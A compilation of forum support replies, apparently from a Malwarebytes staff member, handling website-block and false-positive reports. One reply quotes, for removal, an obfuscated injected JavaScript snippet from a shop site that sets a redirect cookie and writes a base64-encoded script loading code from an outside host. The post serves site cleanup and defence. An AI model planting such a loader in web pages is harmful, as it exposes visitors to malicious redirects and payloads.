[Is it possible to remove website from block list?]

Hello Allshowbiz,

The block will be removed.

Happy Holidays and all the best!

[i01.escargot.log1p.xyz, storage.log1p.xyz and escargot.log1p.xyz]

Hello ChristyBytes,

This is a legit detection as there are some suspicious files hosted.

Happy Holidays and all the best!

[Website blocked?]

Hello VilleHietanen,

The block will be reviewed.

If you need additional help, please let us know.

Happy Holidays and all the best!

[Possible false positive - hxxp:\\ssionsupre.fun]

Hi Sam,

Glad to hear that!

Say Hi to Cosmo and if you need additional help, please let us know.

[worldofspectrum.org]

13 hours ago, swarfega said:

wow thats quick work. Thanks. I can access the site now. Do you know what the cause was?

You are always welcome. Seems that this file raised the suspicions -

https://worldofspectrum.net/pub/sinclair/emulators/pc/windows/kjspeccy.zip

 

[Why is flashdevelop blocked as trojan?]

Hello unknownguy,

The block will be reviewed.

If you need additional help, please let us know.

Happy Holidays!

[moduri.ro]

Hello Tibi,

The block will be reviewed.

If you need additional help, please let us know.

Happy Holidays!

[Please Remove domain from your block list]

Thanks, you are always welcome!

[worldofspectrum.org]

The update should be already out.

[worldofspectrum.org]

Hello swarfega,

The block will be reviewed.

If you need additional help, please let us know.

[Can you please unblock my website, my website is being blocked wrongfully.]

Hello Aman,

The block will be removed as it seems clean now.

If you need additional help, please let us know.

[Please Remove domain from your block list]

The block will be reviewed.

If you need additional help, please let us know.

[Request to remove blocked websites]

Hello dazzlerp,

As the domains are clean now, the block will be removed.

If you need additional help, please let us know.

[Please Remove domain from your block list]

Thanks HFK,

The block will be removed as the website seems clean now.

If you need additional help, please let us know.

Happy Holidays and all the best!

[Possible false positive - hxxp:\\ssionsupre.fun]

Hello Sam,

Have you tried resetting your Google Chrome settings by any chance -

?

Btw, great avatar, I really like it. 

Happy Holidays and all the best!

[Where do we report likely false positives?]

Thank you for your message, I have removed the block.

@gonzo

[GOG Galaxy 2.0 downloads]

Hello Averion,

The block will be removed as the IP seems clean at this point.

If you need additional help, please let us know.

Happy Holidays and all the best!

[111.67.21.187 being blocked]

You are always welcome!
I will be locking this topic, but in case you need additional help, please let us know.

[https://inkchip.net https://forum.inkchip.net - possible false positive fo]

Thanks, the block will be reviewed.

If you need additional help, please let us know.

Happy Holidays!

[Blocking Legitimate Website]

27 minutes ago, Rick_Adams said:

You are blocking my legitimate website and costing me business. I have just been alerted by a website visitor.

https://sovereign-software.biz/

Hello Rick_Adams,

Can you please provide us a log or a screenshot?

As we are not blocking the domain with MB4.

Happy Holidays and all the best!

[https://mwrlibrary.armybiznet.com/ blocked as Trojan?]

Thanks klerwick,

The block will be reviewed.

Happy Holidays and all the best!

[111.67.21.187 being blocked]

8 hours ago, JasonManfred said:

Our host requested zoob remove the files and they have done so. Could you check again and unblock if it's all clear?

Thank you very much, the block will be removed.

Happy Holidays and all the best!

[https://www.lexshop.ro/ - possible false positive for Trojan]

1 hour ago, Mihnealihnea said:

I have gotten in contact with the administrators of the site, and they seem to be struggling to find the location of this line of code. After viewing the source myself it would seem that it's not present there either. Could you please pinpoint the exact branch/location of the mallicious code?

Sure thing, the malicious code has been injected in this page for example -

lexshop.ro/blog/board-games-strategie-tzolkin-praetor/

Happy Holidays and all the best!

[https://www.lexshop.ro/ - possible false positive for Trojan]

Can you remove this malicious code from your website, please -

<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script>

?

[Keeps on saying that BitTorrent has a Trojin virus]

29 minutes ago, cameronwo475 said:

It does same for me. AND I followed instruction for allow list and exclusions and still, ever time bittorrent is run it blocks it. So Malwarebytes technicians your telling me this Mawarebytes Premium service CANNOT tell the difference between a P2P program and a real virus!?!?!?!? That's immensly encouraging. That's hard to believe but rather than try to get it to work for the 50th time I'm just gonna uninstall it and quit my free premium trial 4 days early. What a hassle! Goodbye.

Hi cameronwo475,

As Porthos explained, apps that use Peer-to-Peer (P2P) functionality might connect to many different servers/IP addresses that can be malicious.

Can you please post a screenshot of the exclusion window? As if you exclude the P2P app, there shouldn't be any warnings.

Thank you!